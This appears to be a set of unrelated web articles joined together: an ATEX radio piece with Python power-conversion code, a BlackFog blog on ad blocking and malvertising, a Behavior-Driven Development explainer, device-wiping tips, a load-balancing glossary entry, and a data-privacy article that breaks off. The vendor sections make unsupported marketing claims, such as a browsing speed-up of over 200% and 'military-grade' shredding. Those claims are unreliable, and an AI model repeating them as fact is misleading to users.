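    """Convert transmit power in dBm to watts (0 dBm = 1 mW)."""
    return 10 ** (dbm / 10) / 1000

def watts_to_dbm(watts: float) -> float:
    """Convert watts back to dBm."""
    return 10 * math.log10(watts * 1000)

# ETSI Class 4 nominal Tx power: 30 dBm +/- 2 dB
for dbm in (28.0, 30.0, 32.0):
    print(f"{dbm:.0f} dBm -> {dbm_to_watts(dbm):.2f} W")

# An ATEX Class 4 radio measured at ~0.7 W sits at roughly 28.5 dBm,
# still inside the 30 dBm +/- 2 dB tolerance window.
print(f"0.7 W -> {watts_to_dbm(0.7):.1f} dBm")
```

This makes the trade-off concrete: staying 2 dB below nominal cuts radiated power by roughly a third, which is why coverage planning matters more for ATEX radios.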
This obviously impacts the ability for a radio to operate in poor coverage areas of a facility and can result in ‘dead spots’ where communication is lost altogether. Thus the challenge for ATEX radios is how to enable improved coverage through higher transmission power and a more optimised system design, ensuring users are always connected, can hear all messages broadcast and can respond in all emergencies.
RUGGED FOR A TOUGH ENVIRONMENT
Many ATEX environments are found in the extremes of the planet. From the dust and heat of the Middle East, where temperatures regularly exceed 45°C, to the cold and wet of Siberia, where temperatures can drop below -20°C with snow and ice. This drives the need for radios to operate in the most extreme environments, maintaining ATEX performance levels despite exposure to heat shock or extreme cold, as well as dirt, oil, metal dust and chemicals.
We also see ATEX radios deployed by numerous fire services as they will often be required to respond to situations where the risk of exposure to flammable materials and ignition from their equipment is very real. This is further exacerbated by the need to withstand exposure to multiple water sources. This results in the need for equipment to be able to provide multiple levels of IP protection, even after thermal cycling, heat shock and drop testing.
An ATEX radio communications solution does not stop at the radio. There are a wide range of user requirements when it comes to accessories. Most are tailored for use in a particular environment and this has resulted in a wide array of accessories required by the numerous ATEX users: remote speaker mics; skull mics; boom mics; noise cancelling headsets; hardhat solutions; smoke diver face masks; earpieces; and large Push-To-Talk buttons. This drives the requirement for advanced interoperability between multiple types of accessories and the radio itself to satisfy all types of users.
USABILITY AND ERGONOMICS
A significant number of user groups operating in ATEX environments will be wearing gloves and possibly masks, helmets and other protective clothing when using their communications equipment. This means the radio and accessories need to be optimised for use by people who may have reduced tactility in their fingers, possibly restricted vision, and almost without exception, are working in a loud ambient noise environment. This drives design considerations to ensure users can continue to communicate regardless of potentially major restrictions to their normal senses.
A further aspect of usability is the duration of radio use between charges. Some users will be required to operate long distances from a charger or suitable power source and this encourages a need for extended usage time beyond an average shift of eight hours.
These five key requirements demonstrate the extraordinary technical challenges in delivering communications equipment that not only meets end-user needs but also complies with the ATEX and IECEx standards. The MTP850Ex TETRA ATEX radio has demonstrated, time and again, that it meets these extraordinarily tough technical needs, with more than 100,000 radios already shipped to customers.
Mark La Pensee, Head of TETRA Subscribers, Product Management
Mark is on LinkedIn at https://uk.linkedin.com/pub/mark-lapensee/0/a13/7b9
Online advertising is certainly divisive, often disruptive and sometimes malicious for people browsing the internet, but conversely it supports publishers and the free online content that we have come to rely on. While everyone has an opinion about these often-annoying ads that follow us as we browse or pop up when we try to read an article online, not all ads are created equal. Some are even helpful: targeted ads that remember us and our browsing history can alert us when items we searched for go on sale. However, many are badly designed, intrusive and, in some cases, harmful to users. Privacy issues aside, users should be aware of an even bigger issue: malvertising. Simply put, malvertising is the use of online advertising to spread malware to our devices.
In this blog we’ll discuss the most common questions that arise around the issue of ad blocking and malvertising and why simply blocking ads isn’t enough to protect your privacy and your personal data.
What is Ad Blocking?
Ad blocking, or ad filtering, uses various technologies to block the delivery of, or exposure to, advertising.
Online advertising exists in many forms, such as banners, pictures, pop-ups, animations and embedded audio and video. Ad blockers target and block these ads allowing users to browse the internet without interruption or distraction. All browsers offer ways to alter or remove ads, either by targeting technologies that are used to deliver them, URLs that are the source of the ad or by targeting behavioural characteristics.
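To illustrate the URL-targeting approach mentioned above, here is a minimal, hypothetical sketch of a domain blocklist check. Real ad blockers ship large curated rule lists with thousands of patterns; the domain names below are invented for illustration:

```python
from urllib.parse import urlparse

# Hypothetical blocklist of ad-serving domains; real ad blockers use
# curated lists with thousands of pattern-based rules.
BLOCKED_DOMAINS = {"ads.example.com", "tracker.example.net"}

def is_blocked(url: str) -> bool:
    """Block a request if its host matches, or is a subdomain of, a listed domain."""
    host = urlparse(url).hostname or ""
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)

requests = [
    "https://news.example.org/article",
    "https://ads.example.com/banner.js",
    "https://cdn.ads.example.com/pixel.gif",
]
for url in requests:
    print(("BLOCK" if is_blocked(url) else "ALLOW"), url)
```

A browser-extension blocker applies checks like this to every outgoing request; network-layer tools apply the same idea below the browser, across all applications.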
Why Should I Block Online Ads?
Aside from being generally annoying and disruptive, online ads can be malicious. Many ads that appear on credible and popular websites today contain malvertising. Because these seemingly innocent ads are often delivered by credible publishers, people often don’t hesitate to click on them, thus infecting their desktop or mobile device with malware. The primary publisher of a site often subscribes to ten or more ad delivery and profiling companies at any one time. Since the publisher merely provides links to these third-party servers, it has no idea what is being delivered by these services. As a result, it is relatively easy for bad actors to insert seemingly innocent-looking ads onto these sites which may hide more sinister behaviour. Often these third-party services also aggregate and share information with each other, enabling them to build a detailed profile of each user accessing the site.
By blocking ads, you can help protect yourself from malware and data profiling activities.
What is Malvertising and how Does it Work?
Malvertising has been a popular technique with cybercriminals for over 10 years, with the first documented attack occurring back in 2007 when bad actors abused an Adobe Flash campaign targeting visitors on sites such as MySpace. Cybercriminals use a variety of approaches but malvertising continues to be a popular technique to prey upon unsuspecting users. These malicious ads look like any other ad and can be found on any website, in fact, larger and more popular websites are most often targeted due to the level of trust and exposure of the publication.
Publishers rely on third-party vendors and software to schedule, track and display online ads to generate revenue. The advertising inventory is then sold to potential advertisers, who then have the ability to upload their ads. Because space is typically allocated by a bidding system, the cost for cybercriminals can be quite low. Publishers and third-party vendors are aware of the risks of malvertising and attempt to filter malicious ads out. Conversely, criminals are aware of the methods used to detect them and focus on creating ads that avoid detection. These ads typically focus on duping a user into clicking a link to trigger the download, or the attacker uses a drive-by download technique to expose the user to malicious content. The malicious code is then used to steal the user’s data or infect the device with ransomware or latent malware such as a RAT (Remote Access Trojan).
How can Malvertising Harm me?
Cybercriminals are relentless in their pursuit of easy financial gain and malvertising is a tried and tested technique which allows them to access your personal and/or corporate data. Your data has value and a price and is often later sold to criminals on the Dark Web. In addition to stealing your personal information, cybercriminals can also infect your device with a virus, delete information, hijack your device, engage in crypto-jacking or even spy on you using the microphone and camera. We also can’t ignore the issue of ransomware, a form of malware that locks you out of your device and forces you to pay a ransom to regain control. Witness the devastating effects of such attacks on local governments that were forced to pay over US$500k to regain control of their systems.
Is Malvertising More Dangerous on a Smartphone?
Unfortunately, it is easy to accidentally tap an ad on a smartphone. People often fall prey to malicious ads when playing a game on their mobile device, tapping a screen in the game and accidentally tapping a strategically placed malicious ad. Malvertisements don’t differentiate between intentional and unintentional clicks, so once an ad is tapped the malware loads. As more of us depend on our mobile devices for everyday activities like shopping and online banking, they are becoming a more attractive target for cybercriminals, especially as users typically have no protection installed to mitigate these risks.
What is the Best Free Ad Blocker?
There are many different free products available for download; AdBlock and AdBlock Plus are popular options.
What is the Safest Ad Blocker?
There are many options available, but AdBlock and AdBlock Plus are often referenced as the better solutions in the free category. However, like most things, you get what you pay for. You may need four or five browser plugins to protect you from the various types of network attacks. Even then, you will only have protection in your browser, not the rest of your device, allowing rogue applications and other system-based malware to infect your device.
Commercial solutions, such as BlackFog Privacy, offer a broader array of protection, against not only malvertising, but privacy, crypto-jacking, profiling and the Dark Web to name a few. In addition, BlackFog will monitor the collection of data in real-time and stop the outbound flow of data to ensure that no unauthorized data ever leaves the device. You can download a free trial on blackfog.com for iOS, Android, Mac and Windows.
Will Free Ad Blockers Slow Down my Browser?
Yes, in most cases users will notice a change in their browser speed when using an ad blocker because ad blockers rely on the browser’s built-in scripting technology. Other techniques, such as those employed by BlackFog, operate at a much lower level. BlackFog operates on the network layer of the operating system and therefore offers much greater performance and works across every application on your machine, not just a browser. As a result, it is able to provide broader protection, not just against ads but 12 layers of defense against ransomware, spyware, phishing, unauthorized data collection and profiling. This will subsequently increase your browsing speed and page load times by more than 200%.
Is Ad Blocking Legal?
While ad blocking itself is not illegal, there is some debate around the issue and legalities may vary by country. In 2018 the company behind Adblock Plus won an important, highly publicized legal victory in Germany: the German supreme court ruled that Adblock Plus does not break competition law by charging publishers for inclusion on its whitelist. You can read more about the legalities of ad blocking in this article.
Is AdBlock Safe?
As with most applications you install for the first time, you are likely to see a notification like this: “AdBlock can read, modify, and transmit content from all web pages. This could include sensitive information like passwords, phone numbers, and credit cards.” While this is fairly standard, it is recommended that users add an extra layer of security to their devices. A privacy solution that monitors the flow of outbound data from your device to prevent data profiling and unwanted data collection will ensure that your personal data is secure.
Is AdBlock Free?
Yes, AdBlock is a free product.
Is There an Ad Blocker That Can’t be Detected?
The short answer is, yes. For now. Technology is constantly changing, and it is a constant game of cat and mouse with ad vendors and ad blockers. Some products are less likely to be detected by virtue of the way they operate.
Ad Blockers can typically be detected by websites if desired. Since they operate at the browser level and use scripting to read a web page it is relatively easy to detect if a site has been modified by such a tool. New techniques are constantly being developed to work around the detection, but it is very difficult given the way they operate.
Software such as BlackFog Privacy uses a different technique. Since it operates at the network layer, it is less likely to be detected by anti-adblock techniques. Because it does not technically modify the page content, the site is not able to detect any change and it can therefore run undetected. In addition, by using outbound data blocking it is able to monitor all callbacks.
What are Some of the Main Reasons for Blocking Ads?
- Privacy protection
- Malvertising protection
- Reducing the number of HTTP cookies
- Protection from intrusive ads and pop ups that often lead users to scam sites
- Fewer distractions
- To save battery on mobile devices
- Better user experience
- Less cluttered pages
- Faster content loading
- Prevent undesirable websites from making ad revenue out of the user’s visit
How can I Prevent Cybercriminals from Stealing my Data?
Hackers are going to get in; that’s inevitable. Cybercrime pays and criminals are getting smarter. The good news is that there is technology available to stop them in their tracks. BlackFog is able to spot attackers in real time once they have infiltrated the system and prevents them from removing any of your data, so even if you click on a malicious ad your data and device won’t be compromised.
What Else Should I do to Protect my Privacy When Browsing Online?
Every application you use or website you visit collects information about what you’re doing, and users are giving away unauthorized data every time they go online. Online advertising, which can be malvertising, is certainly a threat that users need to be aware of, but it’s only part of the modern threat landscape. Rather than focusing solely on blocking ads, users should also block the exfiltration of data. A proactive solution like BlackFog Privacy can prevent unwanted data collection and profiling whilst also blocking 99% of online advertising.
In conclusion, blocking ads will enhance a user’s online experience and help to provide important protection from a specific attack vector. However, it is important to emphasize that the threat landscape we see today is infinitely more sophisticated than just a few years ago. Individuals need to adopt a multi-layer defence system to protect their privacy, prevent data loss and put a stop to unauthorized data profiling and data collection. Deploying a solution that blocks outbound data flow will ensure that no unauthorized data ever leaves your device. | <urn:uuid:d24e3727-cc2d-4452-a78d-6a3bf17b4caf> | CC-MAIN-2022-40 | https://www.blackfog.com/what-you-need-to-know-about-ad-blocking-and-malvertising/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00566.warc.gz | en | 0.940948 | 2,277 | 2.84375 | 3 |
Widely known in the tech world by its abbreviation BDD or by the nickname “Specification by Example”, Behavior-Driven Development is generally defined as “a methodology for developing software through continuous example-based communication between developers, QAs, and BAs.” Created by Dan North, BDD is his answer to the frustration of not being able to explain clearly to developers where to start, what not to test, how much to test, what to call their tests, and how to understand why a test fails. Stemming from Test-Driven Development (TDD) and Acceptance Test-Driven Development (ATDD), this methodology is used to bring agility, concrete communication, and a shared understanding of objectives between teams, technical and non-technical.
Essentially, BDD is the collaborative process of describing, in a very direct, example-driven way, a set of behaviors that can be expected from a system. Ultimately, the outcome is that all stakeholders are able to have powerful conversations about what the software should do. On top of that, when implemented correctly, everyone on every team will understand the functionality of deliverables without confusion and be able to identify key results before the development process even begins. In the following article, we will explore the ins and outs of BDD as well as examples of how to implement it in your organization’s software development management methodology.
Acceleration of TDD and ATDD through BDD
In order to understand BDD, you must first be introduced to the meanings of TDD and ATDD as well as how they are used. Following that, you must then understand how BDD accelerates these two methodologies by combining their basic principles into one powerful software development process.
TDD “refers to a style of programming in which three activities are tightly interwoven: coding, testing (in the form of writing unit tests), and design (in the form of refactoring).” When this methodology is in use, a developer first writes a test for a specific unit and runs it to watch it fail, then implements the unit, and finally runs the test again to confirm it passes before refactoring. Because TDD is a key part of the success of BDD, a programmer should know and work within the TDD structure before learning or implementing BDD.
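A minimal sketch of that red-green-refactor cycle, using an invented `slugify` function as the unit under test:

```python
# Step 1 (red): the test is written first, against a function that does
# not exist yet, and is run to watch it fail.
def test_slugify():
    assert slugify("Hello World") == "hello-world"
    assert slugify("  Trim Me  ") == "trim-me"

# Step 2 (green): write just enough code to make the test pass.
def slugify(title: str) -> str:
    return "-".join(title.split()).lower()

# Step 3 (refactor): clean up the implementation while the test stays green.
test_slugify()
print("all tests pass")
```

The function and test names here are illustrative; the point is the order of activities, with the test always written before the code it exercises.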
ATDD “involves team members with different perspectives (customer, development, testing) collaborating to write acceptance tests in advance of implementing the corresponding functionality. The collaborative discussions that occur to generate the acceptance test is often referred to as the three amigos – representing the three perspectives of customers (what problem are we trying to solve?), development (how might we solve this problem), and testing (what about…).” Each test within this methodology should be written in a “given, when, then” style or if-then format, like below:
Given [initial context]
When [event occurs]
Then [ensure some outcomes]
TDD focuses on reducing overall development time and the number of bugs found, via tests at all requirement levels and stronger codebases; ATDD focuses on simplifying communication through a domain-specific-language format and the involvement of every end-result perspective. When the two are combined, we get BDD. Taking what we know from above, that BDD is an example-driven communication methodology used to talk about application behaviors, at its core BDD pairs the conversation structure from ATDD, which even non-developers can understand, with a narrowed-down TDD testing focus aimed at behavior specifics that are best described in business-driven logic.
The 2 Basic Principles
1. User Stories
Plain-language scenarios that describe the intent, the who, and what should happen in order to achieve the requirements of the unit. Within BDD, user stories need to be very specific and always written in whole sentences, including the name/feature. When introducing the method, Dan North stated that “Developers discovered it could do at least some of their documentation for them, so they started to write test methods that were real sentences. What’s more, they found that when they wrote the method name in the language of the business domain, the generated documents made sense to business users, analysts, and testers.” Although scenarios ideally use the word “should” and follow an if-then format, BDD technically calls for no specific scenario format. However, many experts, including Dan, suggest that your organization work with one standardized format so that teams can modify, explore, and expand without issue, now and in the future.
Dan North’s User Story Format
Title (one line describing the story with should)
As a [role] I want [feature] So that [benefit]
Acceptance Criteria: (presented as Scenarios)
Scenario 1: Title
Given [context] And [some more context]…
When [event] Then [outcome] And [another outcome]…
Scenario 2: …
To help you better understand how it looks, here is an API test example, with slight variations in format, taken from Guru:
Feature: Test CRUD methods in Sample REST API testing framework
Given I set sample REST API URL
Scenario: POST post example
Given I Set POST posts API endpoint
When I Set HEADER param request content type as “application/JSON.”
And Set request Body
And Send a POST HTTP request
Then I receive valid HTTP response code 201
And Response BODY “POST” is non-empty.
Scenario: GET posts example
Given I Set GET posts API endpoint “1”
When I Set HEADER param request content type as “application/JSON.”
And Send GET HTTP request
Then I receive valid HTTP response code 200 for “GET.”
And Response BODY “GET” is non-empty
Scenario: UPDATE posts example
Given I Set PUT posts API endpoint for “1”
When I Set Update Request Body
And Send PUT HTTP request
Then I receive valid HTTP response code 200 for “PUT.”
And Response BODY “PUT” is non-empty
Scenario: DELETE posts example
Given I Set DELETE posts API endpoint for “1”
When I Send DELETE HTTP request
Then I receive valid HTTP response code 200 for “DELETE.”
2. Common Languages
As we have stated numerous times throughout this article, and cannot stress enough, BDD relies heavily on the use of language that every member of your team can understand. A Domain-Specific Language (DSL) is what makes each scenario readable by business partners, the people who commission the software and tests in the first place because they want a specific behavior to occur. It removes the need to explain, on both the technical and non-technical ends, how a behavior is implemented, and in return creates less confusion throughout the process.
In order to maximize time and outcomes, BDD is supported by tools that automate tests. Closely linked to the DSL defined by your organization, these tools include Cucumber, which understands Gherkin and supports writing specifications in 30 spoken languages. When in use, such tools automatically execute common-language specifications.
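To illustrate how such tools connect plain-language steps to executable code, here is a minimal sketch of a Gherkin-style step runner. This is not how Cucumber is actually implemented; the step patterns and the inventory scenario are invented for illustration:

```python
import re

# Registry mapping step patterns to Python functions, in the spirit of
# Cucumber/behave step definitions (names here are illustrative).
STEPS = []

def step(pattern):
    def register(fn):
        STEPS.append((re.compile(pattern), fn))
        return fn
    return register

@step(r"Given a stock of (\d+) items")
def given_stock(ctx, qty):
    ctx["stock"] = int(qty)

@step(r"When (\d+) items are sold")
def when_sold(ctx, qty):
    ctx["stock"] -= int(qty)

@step(r"Then the stock should be (\d+) items")
def then_stock(ctx, qty):
    assert ctx["stock"] == int(qty), ctx["stock"]

def run_scenario(lines):
    """Match each plain-language line against the registered step patterns."""
    ctx = {}
    for line in lines:
        for pattern, fn in STEPS:
            m = pattern.fullmatch(line.strip())
            if m:
                fn(ctx, *m.groups())
                break
        else:
            raise ValueError(f"No step definition for: {line!r}")
    return ctx

ctx = run_scenario([
    "Given a stock of 10 items",
    "When 3 items are sold",
    "Then the stock should be 7 items",
])
print("scenario passed, stock =", ctx["stock"])
```

The key idea is that the business-readable sentence is the single source of truth, and the regex-to-function mapping is what makes it executable.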
Launch Behavior-Driven Development In Your Organization
No matter where your organization is in its software development management journey, whether you use agile methods, waterfall, or something else, implementing this methodology offers more potential gain than risk. If the method does not suit your needs, you can simply go back to writing test requirements the way you have been doing it. There is no undoing anything.
To begin, first ensure your developers are working within and understand TDD. If they are not, they will need a training period to develop skills in this style of programming. Once your developers are on board, you can introduce the basics of BDD to your entire organization. Again, a training period will need to take place. During this time, developer, QA, and BA teams need to be taught how to read and understand your chosen DSL and documentation method. Starting with just one project to see how it all works is best. Be aware that this methodology requires specifications before development and constant outside feedback from users, customers, and domain experts. However, when implemented successfully, you will reduce regression and improve goal communication.
When you think about it, the lifecycle of our devices is pretty short. Within a few years of getting a new phone or tablet, for example, we’re often tempted to upgrade to newer, faster models. A common problem with this is that we sometimes forget about the wealth of personal information stored on our devices, and how easy it would be for someone to potentially access our data.
Anything from old text messages and emails, to photos, logins and more could fall into the wrong hands if your device is not wiped clean. That’s why it’s important to take the following precautions before getting rid of old devices.
For most devices, there are two essential steps you need to take to protect your data: backup your information and then restore the device to its original state. Here’s how:
Android is the most popularly used mobile operating system in the world, so there are a lot of old devices floating around. The process of backing up and restoring your phone can differ, however, depending on the manufacturer. Your best bet is to do a web search for instructions on your specific device, but the options for backing up to Google Drive and restoring should both be in the Settings app.
Start with backing up your data to either Apple’s iCloud or iTunes via your computer. Here are step-by-step instructions for backing up to iCloud, and removing your information for iPhones, iPads and iPod Touch devices.
To backup to iTunes, connect your device to your computer and launch the iTunes app. Select “Device” near the top-left corner of your screen, right-click and select “Backup.”
Next, delete the data on your old device by opening the Settings app, selecting “General” and scrolling down to “Reset.” From here, hit “Erase all contents and settings.”
Lost or Stolen Smartphones
If you have taken the precaution of downloading software like McAfee Mobile Security (MMS) on your Android or iOS device, you can remotely back up and then erase the data on your device, even after it has been lost or stolen. And, if you have a “jailbroken” iOS device, you will be able to back up all your data, since an iTunes backup may not include all the data in apps that were not approved by Apple.
Computers & Laptops
First, delete any files or applications you no longer use, and empty your trash. Erase your browser history, and log out of your browser if you are logged in. This ensures that your searches and any stored usernames and passwords are erased.
Then, backup your files either to an external hard drive or cloud service such as Google Drive, or Apple’s iCloud. From there you can easily transfer your files to a new laptop or computer.
Once you have saved your personal information, you can start the process of scrubbing your old machine clean. Start by deleting sensitive files, such as tax returns and financial documents. We recommend you use specialized tools such as McAfee Shredder, included in all McAfee security suites, or File Shredder. These military-grade options ensure that your files cannot be restored after they are deleted.
Then, you can wipe the drive and restore it. This will erase all the remaining data on the drive, and reload the operating system so someone else can use it.
If you have a PC, you might want to use a free program to wipe the drive, following the instructions they offer online.
If you have a Mac, you can erase OS X and reinstall it by following these tips.
We know what you’re wondering: “printers store information too?” They do, if they have a scanning function. The pages or images you have scanned are sometimes stored in the printer’s internal memory and someone who knows what to look for could potentially access them.
There are a couple of ways to keep someone from retrieving your information. First, try unplugging your printer for a while, since it will delete data if it has no local storage. But if it has a disk-drive feature, you’ll need to wipe it clean by going to your settings menu. Of course, you can always find and destroy the drive with a hammer if the printer will no longer be used, but remember to wear protective eyewear!
Lastly, if you are not giving away or selling your old devices, make sure you recycle them properly. You can contact a local e-recycling center, or, if you have an iOS device you may be able to send them back to Apple for recycling.
Server Load Balancing Definition
Server Load Balancing (SLB) is a technology that distributes traffic for high-traffic sites among several servers using a network-based hardware or software-defined appliance. When load balancing is done across multiple geographic locations, the intelligent distribution of traffic is referred to as global server load balancing (GSLB). The servers can be on premises in a company’s own data centers, or hosted in a private cloud or the public cloud.
Server load balancers intercept traffic for a website and reroute that traffic to servers.
What is Server Load Balancing?
Server Load Balancing (SLB) provides network services and content delivery using a series of load balancing algorithms. It prioritizes responses to the specific requests from clients over the network. Server load balancing distributes client traffic to servers to ensure consistent, high-performance application delivery.
Server load balancing ensures application delivery, scalability, reliability and high availability.
How does Server Load Balancing Work?
Server load balancing comes in two main types:
• Transport-level load balancing is a DNS-based approach which acts independently of the application payload.
• Application-level load balancing uses traffic load and application-level characteristics to make balancing decisions, as with Windows server load balancing.
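As a simple illustration of one balancing decision, here is a minimal sketch of round-robin server selection with basic health awareness. The IP addresses are hypothetical, and production load balancers support many more algorithms (least connections, weighted, hash-based):

```python
import itertools

class RoundRobinBalancer:
    """Minimal round-robin server selection, skipping unhealthy servers."""

    def __init__(self, servers):
        self.servers = list(servers)
        self.healthy = set(self.servers)
        self._cycle = itertools.cycle(self.servers)

    def mark_down(self, server):
        self.healthy.discard(server)

    def mark_up(self, server):
        self.healthy.add(server)

    def next_server(self):
        # One full pass over the cycle is enough to visit every server once.
        for _ in range(len(self.servers)):
            server = next(self._cycle)
            if server in self.healthy:
                return server
        raise RuntimeError("no healthy servers available")

lb = RoundRobinBalancer(["10.0.0.1", "10.0.0.2", "10.0.0.3"])
print([lb.next_server() for _ in range(4)])   # cycles 1, 2, 3, then back to 1
lb.mark_down("10.0.0.2")
print([lb.next_server() for _ in range(3)])   # skips the downed server
```

Real appliances make this decision per connection (layer 4) or per request (layer 7), feeding health-check results into the same kind of selection loop.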
What are the Advantages of Server Load Balancing?
Distributing incoming network traffic across multiple servers through web server load balancers aims to increase the efficiency of application delivery to end users for a reliable application experience. IT teams are increasingly relying on server load balancers to:
• Increase scalability: load balancers can spin server resources up or down based on spikes in traffic, directing requests to the pool of servers best suited to handle the increase and keeping application performance optimized.
• Redundancy: using multiple web servers to deliver applications or websites provides a safeguard against inevitable hardware failure and application downtime. When server load balancers are in place, they can automatically transfer traffic from failed servers to working ones with little to no impact on the end user.
• Maintenance and performance: businesses with web servers distributed across multiple locations and a variety of cloud environments can schedule maintenance at any time with minimal impact on application uptime, as server load balancers redirect traffic to resources that are not undergoing maintenance.
What is the Difference Between HTTP Server Load Balancing and TCP Load Balancing?
HTTP server load balancing operates on the simple HTTP request/response architecture and is designed for HTTP traffic, while a TCP load balancer serves applications that do not speak HTTP. TCP load balancing can be implemented at layer 4 or at layer 7. An HTTP load balancer is a reverse proxy that can perform extra actions on HTTPS traffic.
Does Avi offer Server Load Balancing?
Yes. Avi Networks delivers modern, multi-cloud load balancing, including an entirely innovative way of handling local and global server load balancing for enterprise customers across the data center and clouds.
This capability delivers:
• Active / standby data center traffic distribution
• Active / active data center traffic distribution
• Geolocation database and location mapping
• Consistency across data centers
• Rich visibility and metrics for all transactions
For more on the actual implementation of load balancers, check out our Application Delivery How-To Videos.
For more information on server load balancing see the following resources: | <urn:uuid:8ae15533-3216-4689-b231-048d816cb1c7> | CC-MAIN-2022-40 | https://avinetworks.com/glossary/server-load-balancer/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00766.warc.gz | en | 0.848832 | 683 | 3.34375 | 3 |
Data privacy is subjective and complicated, but it definitely does matter – and more so every year as cybersecurity threats increase and a federal privacy law remains a pipedream in the United States.
“More and more data about each of us is being generated faster and faster from more and more devices, and we can’t keep up. It’s a losing game both for individuals and for our legal system. If we don’t change the rules of the game soon, it will turn into a losing game for our economy and society,” says Brookings Institution global thought leader on privacy, AI and cross-border challenges in information technology, Cameron F. Kerry.
The IAPP defines data privacy as, “the right to have some control over how your personal information is collected and used.” But why does control matter? What’s the big deal if a company knows your name and address because they sent you the parcel you ordered? Or if Big Tech can track you across web sites and build a profile of you based on your browsing history?
We’ll give you 9 good reasons why data privacy matters.
1. Privacy is a fundamental human right.
Privacy is addressed in all the major human rights instruments, including the United Nations Declaration of Human Rights 1948, Article 12, and in the constitutional statements of around 130 countries. Protecting your fundamental right to privacy means you can:
- limit others’ control over you, to know about you and to cause you harm
- better manage your professional and personal reputations
- put in place boundaries and encourage respect
- maintain trust in relationships and interactions with others
- protect your right to free speech and thought
- pursue second chances for regaining your privacy
- feel empowered that you’re in control of your life.
2. Web sites and services collect personal data about you — much of it highly sensitive.
Unsurprisingly, every company in business wants to sell you their products and services. To have the best chance of landing the sale, they want to know as much information about you as possible so they can personalize ads (more on that later) and target their sales push.
But a lot of the personal data that web sites and services collect includes some of the most personal and highly sensitive information you possess, including your name, SSN, home address, telephone numbers, what property you own, login details, personal opinions posted anywhere, criminal records, life events such as divorce, and every single purchase you make.
This data tracking and collection is called surveillance capitalism, which drives what’s known as the data economy. Professor Emerita Shoshana Zuboff of Harvard Business School first defined surveillance capitalism as, “the unilateral claiming of private human experience as free raw material for translation into behavioral data. These data are then computed and packaged as prediction products and sold into behavioral futures markets — business customers with a commercial interest in knowing what we will do now, soon, and later.”
3. Businesses use the personal data to personalize ads and online experiences.
Personalized ads rely on the invasive surveillance of your personal data we’ve just covered. And while it’s true that some consumers want a personalized online shopping experience because it might save time and money and enhance their online experience, it’s also true that, increasingly, consumers don’t want personalization or hyper-personalization when it comes at the expense of their privacy. Only 21% of US consumers want apps to track them across the internet for targeted advertising under Apple’s new App Tracking Transparency (ATT) feature, for instance.
The ad personalization process known as real-time bidding is fraught with significant data privacy issues:
- Hundreds of businesses get access to a user’s data
- Almost anyone can participate in the process, and while there are penalties for misusing bid stream data, parsing the data is still highly valuable to participants.
- Bid stream data can be harvested even without third party cookies so recent efforts by Apple and Google to ban third party cookies do nothing to mitigate the privacy risks.
- The bid stream data is usually anonymized but it’s relatively easy to match a user to their information.
- Data brokers readily package the bid stream data (particularly valuable location data) and sell it to other businesses and even governments with little oversight.
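The claim that "anonymized" data is easy to match back to a person can be made concrete with a small sketch. The records below are entirely made up; the point is that joining two datasets on quasi-identifiers (here, ZIP code plus device model) can recover a name even when the bid-stream records themselves carry none.

```python
bid_stream = [  # "anonymized" ad records: no names, but precise quasi-identifiers
    {"ad_id": "a1", "zip": "90210", "device": "Pixel 7", "hour": 9},
    {"ad_id": "a2", "zip": "10001", "device": "iPhone 14", "hour": 22},
]
loyalty_db = [  # a broker's second dataset, with names attached
    {"name": "J. Doe", "zip": "90210", "device": "Pixel 7"},
    {"name": "A. Roe", "zip": "10001", "device": "iPhone 14"},
]

reidentified = {}
for record in bid_stream:
    matches = [p["name"] for p in loyalty_db
               if p["zip"] == record["zip"] and p["device"] == record["device"]]
    if len(matches) == 1:  # a unique match re-identifies the "anonymous" user
        reidentified[record["ad_id"]] = matches[0]

print(reidentified)  # {'a1': 'J. Doe', 'a2': 'A. Roe'}
```

With real bid-stream volumes and richer quasi-identifiers such as precise location, unique matches become far more common, which is why anonymization alone offers weak protection.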
4. Businesses also use personal data to set higher prices, control the content you see, and influence your purchasing and even political decisions.
Every action you perform online has become a piece of data which is used to coerce and constrain your digital experiences. You see it in the ads that show up across all your devices after an Internet search, in the ever-narrower set of content you’re shown on your social media sites, and in the increasingly compelling, and sometimes spooky, product recommendations you receive.
Web sites and services track your behavior, particularly your repeated behavior, such as frequent location, hotel and flight searches, and use the data to increase the price at a future date since they know you are interested and more likely to make a purchase.
And of course the Facebook Cambridge Analytica scandal is a great case study of how personal information can be breached and used to influence political decisions.
The cherry on top for businesses is they can use all this consumer data to improve their own product offerings and supply chains.
5. Data brokers are worse than the companies who collect the data.
Data brokers aggregate and package up personal data and sell it for huge profit too.
Data brokers are businesses that harvest, manipulate and even misrepresent consumer data and sell it to other businesses, usually for marketing purposes. Data brokers are legitimate but unregulated businesses; there are about 4,000 of them worldwide, and their industry is worth about US $200 billion annually.
Many of the brands and businesses that you interact with and buy from see your data as an additional lucrative product they can sell to others for profit. Around 1,500 leading brands sell the data from their customer loyalty programs, and that data can go into many different databases. Some of these brands are Google and Facebook, and even banks.
Once data brokers have the information, they sell it, usually in list form. Your email address would be worth about $80 on a list of people with a particular medical condition such as diabetes, and about $250 on a list of a particular class of traveler.
6. Even governments can see what you are doing online.
Governments do request access to personal data held by the private sector, and it’s the subject of much regulatory debate and consumer concern. In 2019, 66% of US adults said they believe they face more potential risks than benefits from government data collection.
The OECD says, “Unlimited government access to personal data held by the private sector, including for stated national security reasons, negatively impacts trust in the digital economy, creating uncertainty with adverse market effects,” but acknowledges that “data flows across borders are integral to the global digital economy and a necessary input for reaping the benefits of digitalisation.”
The ideal is to put in place appropriate governance and safeguards for trusted government access to personal data held by private entities, which is on the OECD’s agenda.
7. Some businesses use dark patterns to maximize the data they gather.
Dark patterns are intentional user experience features of websites and apps designed to make it harder for you to do what you want, either through complexity or deception.
Think of dark patterns as traps to get more of your personal information and to tempt you into buying products and services.
The motivation for trapping users online is profit, either directly through a purchase or indirectly through data sharing, which is at the root of surveillance capitalism as we said. The more information a brand has about its users, the better they can target their audiences with tailored content in the hope they’ll buy.
Find out more about common dark patterns.
Australia’s Competition and Consumer Commission also just pointed out that the lack of choice in device settings such as a pre-installed search engine (by the all-powerful Google) is another way tech giants quietly assume control over consumer data.
8. Stored personal data can be caught in a data breach.
